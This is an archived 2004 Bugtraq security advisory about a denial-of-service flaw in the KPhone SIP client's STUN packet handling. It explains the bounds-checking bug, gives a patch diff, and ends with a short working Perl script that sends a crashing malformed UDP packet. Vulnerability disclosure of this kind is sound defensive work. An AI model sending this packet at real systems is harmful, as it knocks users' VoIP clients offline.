Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos network security services platform







Bugtraq: KPhone STUN DoS (Malformed STUN Packets)

KPhone STUN DoS (Malformed STUN Packets)

From: Aviram Jenik <aviram_at_beyondsecurity.com>
Date: Mon, 19 Apr 2004 15:24:52 +0300

 KPhone STUN DoS (Malformed STUN Packets)
------------------------------------------------------------------------

Article reference:
http://www.securiteam.com/unixfocus/5PP0B1FCLY.html

SUMMARY

<http://www.wirlab.net/kphone/> KPhone is "a SIP (Session Initiation Protocol)
user agent for Linux, with which you can initiate VoIP (Voice over IP)
connections over the Internet". KPhone allows its users to enable STUN server
interconnectivity. This interconnectivity allows a remote attacker to crash
the KPhone program by sending it a malformed STUN response packet. The
vulnerability doesn't allow the attacker to execute arbitrary code, but only
to cause a denial of service attack (the program will crash).

DETAILS

Vulnerable Systems:
* KPhone version 4.0.1 and prior

Immune Systems:
* KPhone version 4.0.2 or newer

The vulnerability lies in the fact the size of the received packet is not
verified against its user defined size. The vulnerable code lies at
(sipclient.cpp):
void SipClient::incomingMessage( int socketfd )
..
char inputbuf[ 8000 ];
..
StunMsgHdr* hdr = reinterpret_cast( inputbuf );
..
char* body = inputbuf + sizeof( StunMsgHdr );
unsigned int size = ntohs( hdr->msgLength ); // The size comes from msgLen
..
while( size > 0 ) {
StunAtrHdr* attr = reinterpret_cast( body );
unsigned int hdrLen = ntohs( attr->length );
..
body += hdrLen+4; // The hdrLen comes from the attrLen
size -= hdrLen+4;
}

As attrLen can be set to a bigger value than 8000 (the longest value we can
place in hdrLen is 0xFFFF = 65535), we can cause the body pointer to point to
a memory location outside the scope of our function, thus causing a SEGFAULT.

Patch:
Beyond Security has written a patch that will make sure that the data received
is indeed safe for parsing (verifying all of the msgLen and hdrLen)
356a357,362
> // check that the size of the header isn't larger than what we've read
> if ((signed int)sizeof(StunMsgHdr) > bytesread)
> {
> printf("Malformed packet (sizeof(StunMsgHdr) > bytesread)\n");
> return;
> }
357a364,369
> // check that the msg length + the hdr length is exactly what we've read
> if( (signed int)(ntohs(hdr->msgLength) + sizeof(StunMsgHdr)) != bytesread)
> {
> printf("Malformed packet (hdr->msgLength + sizeof(StunMsgHdr)) !=
bytesread)\n");
> return;
> }
365a378,383
> // check that our attribute length is not larger than the remaining
size
> if (hdrLen+4 > size)
> {
> printf("Malformed packet (hdrLen+4 > size)\n");
> return;
> }

Vendor status:
The vendor has issued a new version 4.0.2, which addresses this issue.

Exploit:
#!/usr/bin/perl
#

use IO::Socket::INET;

my $buf = join("", "\x01\x01", # BindingResponse
  "\x00\x01", # MsgLength
  "A"x16, # GUID
  "\x00\x00", # Attribute
  "\x08\x01", # AttrLength
  "A"x7975 # Value
  );

my $remote = IO::Socket::INET->new( Proto => 'udp',
    PeerAddr => '192.168.1.49',
    PeerPort => 5060);

print $remote $buf;

ADDITIONAL INFORMATION

SecurITeam would like to thank <mailto:storm_at_securiteam.com> STORM for
finding this vulnerability.

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
Received on Apr 20 2004

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]